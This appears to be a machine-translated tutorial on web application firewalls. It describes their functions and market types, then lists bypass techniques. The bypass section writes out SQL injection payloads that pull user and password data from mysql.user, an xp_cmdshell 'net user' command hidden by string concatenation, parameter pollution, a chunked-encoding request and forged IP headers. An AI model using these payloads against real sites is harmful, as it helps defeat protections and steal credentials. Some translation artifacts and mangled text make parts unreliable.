Waf functionality, classification, and bypass

I. WAF working principle

Web application firewall is a product that protects Web applications by implementing a series of HTTP/HTTPS security policies.

Common system attacks fall into two categories:

• One is to use Web server vulnerabilities to attack, such as DDOS attacks, virus and Trojan horse destruction attacks;
• The second is to use their own security vulnerabilities to attack, such as SQL injection attacks, cross-site scripting attacks. Common attacks on web servers mainly focus on viruses and Trojans, illegal tampering of web pages, and threats brought by various network attacks.

1. The introduction of waf

WAF is short for Web Application Firewall. It detects and verifies all kinds of requests from Web Application clients to ensure their security and legitimacy, blocks illegal requests in real time, and protects Web applications. WAF is also called Application Firewall. Network security is an important part of the deep defense system. WAF belongs to detection and corrective defense control measures. Wafs are classified into hardware WAFs, software WaFs (ModSecurity), and cloud WAFs.

The WAF performs rule matching and behavior analysis on the request content to identify malicious behaviors and perform related actions, such as block, record, and alarm.

1. Main functions of WAF

1. Net horse trojans active defense and kill

The detection rate of WEB Trojan and WEB horse scanning tool is more than 90% by adopting the algorithm of feature code + heuristic engine

2. Traffic monitoring

Real-time monitoring of incoming and outgoing traffic and total traffic for each site, as well as CPU usage for each application pool and site

3. Website vulnerability defense function

Can intercept GET, POST, COOKIES and other FORMS of SQL injection, can GET, POST, COOKIES, respectively define the characteristic code, and can intercept XSS injection and other behaviors. 4. Protection of dangerous components

Comprehensive interception of malicious code on the component of the call authority, interception IIS malicious program to protect website security 5.. Net security protection module

Fast setting.Net security mode, disable. Net implement system sensitive function, ensure website security 6. Double layer anti-theft link mode

You can set up anti-theft chain filtering for different sites to prevent pictures, desktops, software, music, and movies from being referenced. If the requestor is found to have stolen the link, it is automatically redirected to the error handling page 7. Site specific resources to prevent downloading

Support anti-download protection for doc, MDB, MDF, MYD and other specific resources. Add the path of sensitive data to be protected to prevent sensitive data from being downloaded. 8

Independent research and development of unique anti-attack algorithm, efficient active defense system can effectively defend CC attacks, traffic attacks. 9. Site traffic protection

Support download flow control, download thread control. Use original thread control and flow control technology, greatly improve server performance, protect website traffic.

10.IP blacklist and whitelist

The all-IP blacklist and whitelist feature allows users to set a personalized IP trust list and directly block or allow specific IP addresses to access websites. At the same time, the temporary iP blacklist function is added, and the iP whitelist function for a certain function is implemented. At the same time, crawler whitelist provides crawler trust mechanism, allowing users to customize crawler trust in case of false interception.

Ii. Waf classification of the market

1. Hardware Waf:

Green Alliance, Qiming, Anheng, know chuangyu, tianrongxin, etcCopy the code

Hardware WAFs are deployed in front of Web servers in serial mode to detect and block abnormal traffic. Conventional hardware Waf is implemented by proxy technology to proxy traffic from the outside, and the request packet is analyzed, and the request packet is matched by the attack rules of the security rule base. If the rule in the rule base is matched successfully, it is identified as an exception and the request is blocked.

2. Software Waf:

Security dog, cloud lock, middleware built-in Waf module, D shield, etcCopy the code

The software Waf is installed on the server that needs to be protected. The implementation method is usually Waf listening port or request detection and blocking by Web container extension.

3. Cloud WAF:

Ali Cloud, Security dog, An Heng, know chuangyu, Tencent website manager, etcCopy the code

Cloud WAF, also known as the cloud mode of WEB application firewall, enables users to implement security protection for websites without installing software programs or deploying hardware devices on their own networks. It mainly realizes security protection by transferring domain name resolution rights through DNS technology. The user’s request is first sent to the cloud node for detection. If there is an abnormal request, it is intercepted; otherwise, the request is forwarded to the real server.

Third, Waf bypass method

1. Burp Install the WAF module

• Step: Plug-in extension –BApp Store–Bypass WAF
• Item options — Meeting — Session processing rule — added

2. Use tools to forge user agent headers such as Baidu and Google or forge whitelist special directories

• The user-agent to modify baidu and other major search engines can be bypassed, replace here with Baidu and other search engines user-agent

3, coding bypass, the SQL statement coding can bypass WAF

4, modify request bypass

• Use waF’s default rules to bypass, such as default only for GET interception, not post interception, then we can bypass WAF with POST mode transport

5. Compound parameter bypass

• For example, a request looks like this

GET /pen/news.php? id=1 union select user,password from mysql.user

• Can be changed to

GET pen/news.php? id=1&id=union&id=select&id=user,password&id=from%20mysql.user

Many WAFs can be wrapped in this way, to test that the latest version of WAF can bypass some statements

6. Bypass WAF trigger rules

Special characters replace Spaces:%0a/**/ 23 - / * | % % 23 | * /

Special character concatenation:+

• Such as:GET /pen/news.php? id=1; exec(master.. xp_cmdshell 'net user')
• Could be:GET /pen/news.php? id=1; exec('maste'+'r.. xp'+'_cmdshell'+'"net user"')

Comments contain keywords

Such as: GET/pen/news. PHP? id=1 union select user,password from mysql.user

GET /pen/news.php? id=1 /*! union*/ /*! select*/ user,password /*! from*/ mysql.user

Space substitution

• Replace the space with%0a/**/To bypass

Use case

• http://www. * * *. Com/index. PHP? Page_id = 15 uNIoN sELecT 1, 2, 3, 4... .

Double writing around

• UNIunionON SELselectECT 1, 2, 3, 4... .After being filtered by waF, it becomesUnion select 1, 2, 3, 4...

Exclusive or bypass

• lucy' Xor '1'='1' #

Use the function of WAF itself to bypass, replace “” with empty union+sel*ect+1,2,3,4….

Grouping: coding and annotation

1, replace method +URL encoding 2, comment + replace method 3, inline comment + replace method

Urlencode = %26%26% 20%26%26%20-1=-1

7, block transmission bypass

Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Content-Length: 87 4 id=1 6 union 7 select 2 1 8,user(), 5 3,4,5 0Copy the code

Transfer-Encoding: chunked

Id = 1 union select 1, the user (), three, four, five

8, cloud WAF bypass

Look for real IP to bypass cloud WAF

Cloud WAF forges request header information

X - Originating - IP: 127.0.0.1 X-ray Forwarded - For: 127.0.0.1 X - Remote - IP: 127.0.0.1 X - Remote - Addr: 127.0.0.1 X - the Client - IP: 127.0.0.1Copy the code

There are many ways to bypass WAF, and many ways are obsolete. You need to keep thinking about the possibilities of bypassing it, and constantly improve it.